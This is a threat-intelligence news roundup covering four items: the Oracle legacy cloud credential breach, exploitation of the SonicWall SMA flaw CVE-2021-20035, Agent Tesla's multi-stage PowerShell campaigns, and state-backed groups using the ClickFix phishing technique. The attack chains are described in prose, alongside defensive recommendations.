Update: Oracle Legacy Server Breach Expands in Scope, Prompts CISA Advisory
In a new advisory, CISA has flagged increased breach risks following the compromise of Oracle’s legacy Cloud Classic (Gen 1) servers, building on earlier reports but now emphasizing the potential for long-term credential misuse. Though Oracle initially claimed the incident involved "two obsolete servers" and did not impact current Oracle Cloud services, threat actors have since posted newer credential data from late 2024 and early 2025 on BreachForums. Security researchers and Oracle clients have verified portions of this leaked information, which includes LDAP display names, email addresses, hashed passwords, and user metadata, many of which remain valid. Compounding the risk, the compromised credentials were likely embedded in automation tools, infrastructure templates, or scripts—making them harder to detect and replace. According to CybelAngel, attackers planted web shells and malware on legacy systems as early as January 2025 and accessed Oracle Identity Manager (IDM) databases containing sensitive user credentials until the breach was discovered in late February. These revelations directly challenge Oracle’s earlier assurance that the incident was limited to outdated infrastructure. CISA’s updated guidance reflects mounting concern over the possibility that exposed credentials have been reused across unrelated systems or remain active within enterprise networks. The agency urges organizations to reset all potentially affected credentials, replace any embedded authentication tokens with secure alternatives, and implement phishing-resistant multi-factor authentication wherever possible. Monitoring authentication logs for anomalies and unauthorized access attempts is now critical, particularly for companies with historical ties to Oracle’s cloud services. Meanwhile, Oracle has continued issuing private notices to affected customers and recently confirmed a separate breach targeting Oracle Health (formerly Cerner), which exposed patient data at several U.S. healthcare facilities. This broader incident timeline, stretching from early January into March 2025, paints a more serious picture of coordinated and prolonged access to multiple Oracle-managed environments. This is not just a historical concern for organizations that previously integrated with Oracle’s legacy platforms—it represents an ongoing risk that requires immediate mitigation.
Active Exploitation of SonicWall SMA Vulnerability Prompts CISA Directive
CISA has issued a formal warning regarding CVE-2021-20035, a critical vulnerability affecting SonicWall’s Secure Mobile Access (SMA) 100 series appliances. Though patched initially in 2021 and considered a denial-of-service risk, SonicWall recently revised its advisory to confirm that the flaw is now being actively exploited to achieve remote code execution. The vulnerability in the SMA management interface allows authenticated attackers with low privileges to inject and execute arbitrary commands as the 'nobody' user. By exploiting this flaw, attackers can control the targeted system through low-complexity, high-impact methods. Devices affected include SMA 200, 210, 400, 410, and 500v running on platforms like ESX, KVM, AWS, and Azure. Patches have been made available across several firmware branches, with fixes introduced in versions 10.2.1.1-19sv, 10.2.0.8-37sv, and 9.0.0.11-31sv, depending on the initial build. In response to confirmed in-the-wild exploitation, CISA has added CVE-2021-20035 to its Known Exploited Vulnerabilities (KEV) catalog, mandating all Federal Civilian Executive Branch (FCEB) agencies to apply patches no later than May 7, 2025, under Binding Operational Directive 22-01. Although this deadline applies to federal systems, CISA strongly urges all public and private organizations to prioritize remediation due to the ease of exploitation and potential impact. This advisory comes from multiple critical SonicWall vulnerabilities disclosed in early 2025, including an authentication bypass in Gen 6 and Gen 7 firewalls that hijack VPN sessions and a zero-day in SMA1000 secure access gateways. These incidents highlight a trend of threat actors targeting SonicWall appliances to establish footholds in enterprise networks. Organizations are advised to inventory all SMA deployments, verify patch levels, monitor for unusual authentication attempts, and restrict management interface exposure to trusted networks only. Failure to act could compromise remote access systems that often serve as gateways into broader internal infrastructure.
Update: Agent Tesla Returns with Multi-Stage Delivery and Script-Based Evasion
Recent research from Broadcom has uncovered a new round of Agent Tesla campaigns that use highly structured, multi-step infection chains to bypass traditional defenses. The attack begins with a socially engineered email containing an archive attachment, often tailored to look legitimate. Inside is a JavaScript file that, once executed, launches a PowerShell script as the second stage. PowerShell is used to download and run additional payloads directly in memory, helping the attacker avoid triggering antivirus tools that rely on scanning files. The malware is ultimately injected into a trusted running process, allowing it to steal data without raising immediate red flags. This fileless approach makes the campaign more difficult to detect and gives attackers prolonged access to compromised systems. Agent Tesla’s use in this setup points to a continued focus on credential harvesting, clipboard monitoring, and exfiltration of sensitive user data. Security vendors are responding by strengthening detection at multiple layers. Symantec has deployed new adaptive and behavior-based signatures that catch script-based activity and look for signs of abuse in PowerShell and Wscript engines. They also flag behavioral anomalies using SONAR technology to detect unusual process execution and suspicious outbound connections. Network-level protections now focus on identifying script hosts attempting external communication, while web filtering blocks access to known malicious infrastructure. VMware Carbon Black adds to the defense with real-time cloud-based scanning, delaying execution until the file’s reputation is confirmed. These defenses reflect the need to detect threats based on files and how scripts behave once executed. Organizations should re-evaluate email protections, restrict script execution, and reinforce user training around identifying phishing attempts, as these entry points remain the most consistent weakness in the attack chain.
Update: State-Backed Threat Actors Adopt ClickFix for Stealthy Malware Deployment
Between late 2024 and early 2025, state-sponsored actors from North Korea, Iran, and Russia began leveraging a deceptive tactic called ClickFix to deliver malware through carefully crafted phishing campaigns. Unlike traditional malware delivery, ClickFix tricks victims into executing malicious PowerShell commands by framing the process as part of a legitimate task, including completing a CAPTCHA, registering a device, or fixing a system error. Proofpoint researchers observed TA427 (Kimsuky) using this method to target individuals linked to North Korean policy discussions by spoofing diplomatic identities and guiding them through fake embassy websites. Victims were persuaded to manually run commands that initiated a multi-stage infection chain, resulting in the download of Quasar RAT, a remote access trojan. The process included dropping a Visual Basic Script scheduled to execute every 19 minutes, ultimately delivering batch scripts that deployed the final payload, all while displaying decoy documents to distract the user. Iran-linked TA450 (MuddyWater) also integrated ClickFix into its operations by disguising malicious payloads as Microsoft security updates during Patch Tuesday. The phishing messages pushed recipients to run PowerShell as an administrator, then enter commands that installed legitimate remote monitoring software—later used for espionage and data exfiltration. This campaign targeted Finance, Government, and Transportation sectors across regions, including the U.S., Canada, and the Middle East. Around the same time, a suspected Russian group, UNK_RemoteRogue, launched its own ClickFix campaign using compromised Zimbra servers to send lure emails to defense-related organizations. These emails led to spoofed web pages with detailed instructions—and even tutorial videos—guiding users to paste code into PowerShell, which executed commands tied to the Empire C2 framework. This convergence of threat actors adopting ClickFix in rapid succession signals the technique's effectiveness and its likely continued use across different geopolitical regions and objectives.
